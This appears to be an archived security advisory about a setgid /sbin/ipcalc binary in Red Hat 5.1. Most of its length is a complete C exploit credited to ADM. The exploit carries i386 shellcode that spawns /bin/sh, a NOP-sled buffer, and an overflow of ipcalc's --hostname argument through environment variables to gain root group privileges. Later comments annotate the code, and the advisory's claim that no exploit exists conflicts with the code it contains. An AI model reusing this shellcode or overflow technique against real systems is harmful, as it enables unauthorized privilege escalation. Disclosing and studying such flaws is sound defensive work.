COMMAND

    ipcalc

SYSTEMS AFFECTED

    RedHat 5.1

PROBLEM

    The /sbin/ipcalc binary in the Red Hat 5.1 initscripts had the
    setgid bit turned on inadvertently, which may give local users
    access to the root group (no exploit has been published yet).

    /****   ADM PRIVATE -- DO NOT DISTRIBUTE
    
      one-minute RedHat 5.1 /bin/ipcalc exploit
      by plaguez from ADM.  Gives you egid=0.
    
      Greets to all ADM ppl.
    
    ****/
    
    
    #include <stdio.h>
    #include <unistd.h>
    
    
    /* Machine-code payload handed to the target process through the
     * environment (see MACHIN in main).  The trailing "/bin/sh" literal is
     * the program it launches; the leading bytes are raw i386 instructions,
     * so nothing in this array is type-checked by the compiler. */
    char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh\x0";
    
    
    
    /* Command line run through system()/sh.  Note the advisory text names
     * /sbin/ipcalc while this path is /bin/ipcalc.  $BIDULE is expanded by
     * the shell inside the double quotes, so the bytes of that environment
     * variable become part of ipcalc's --hostname argument. */
    #define CHAINE "/bin/ipcalc --hostname \"12.12.12.1 $BIDULE\""
    /* Size of the 0x90-filled buffer that ends in shellcode (env MACHIN). */
    #define SCSIZE 4096
    /* Size of the address-filled string passed via the hostname (env BIDULE). */
    #define BOSIZE  240
    /* Default distance from the current stack pointer; argv[1] adjusts it. */
    #define DEFAULT -1000
    
    /* Returns the current stack pointer.  The inline asm copies %esp into
     * %eax and the function then falls off the end with no C return
     * statement, relying on the i386 convention that %eax carries the
     * return value.  As portable C this is undefined behaviour; it is
     * i386-only and may break under optimisation. */
    unsigned long get_esp(void) {
       __asm__("movl %esp,%eax");
    }
    
    
    /* Proof-of-concept from the advisory.  Builds two environment variables
     * and runs ipcalc through /bin/sh: MACHIN holds a large buffer of 0x90
     * bytes ending in `shellcode`; BIDULE holds a string of repeated guessed
     * stack addresses and is expanded into ipcalc's --hostname argument
     * (see CHAINE).  The privilege gain comes solely from the setgid bit the
     * advisory describes; that ipcalc copies the hostname into a fixed-size
     * stack buffer without a length check is inferred from this payload
     * layout, not stated in the advisory.
     *
     * Portability notes: `void main` is non-standard; atoi, memset, memcpy,
     * strlen, setenv and system are called without <stdlib.h>/<string.h>,
     * so they are implicitly declared (pre-C99 behaviour, an error in
     * current compilers). */
    void main(int argc, char * argv[])
    {
      char sc[SCSIZE],bo[BOSIZE];
      int offset = DEFAULT;
      long *addr;
    
      /* Optional argv[1] adjusts the address guess; atoi gives no error
       * reporting, so non-numeric input silently becomes 0. */
      if(argc > 1)
        offset -= atoi(argv[1]);
    
      addr = get_esp() - offset;
    
      /* %x with a pointer argument is a format/argument mismatch; %p is the
       * matching conversion. */
      printf("\ntarget addr: 0x%x\n",addr);
    
      /* Reuses addr as a cursor: fills bo with long-sized copies of the
       * guessed address, stopping before the final byte, which becomes the
       * NUL terminator below.  get_esp() is re-evaluated each iteration. */
      for(addr=(long*)bo;addr<(long*)&bo[BOSIZE-1];addr++)
        *addr=get_esp()-offset;
      bo[BOSIZE-1]='\x0';
    
      /* 0x90 (i386 NOP) fills the buffer, the shellcode is copied to its
       * very end, and the buffer is NUL-terminated so it survives as an
       * environment string.  strlen(shellcode) is computed twice. */
      memset(sc,'\x90',SCSIZE);
      memcpy(sc+SCSIZE-strlen(shellcode)-1,shellcode,strlen(shellcode));
      sc[SCSIZE-1]='\x0';
    
      /* Both variables are inherited by the shell and by ipcalc.  Return
       * values of setenv() and system() are not checked. */
      setenv("MACHIN",sc,1);
      setenv("BIDULE",bo,1);
    
      system(CHAINE);
    
    }

SOLUTION

    Fixed.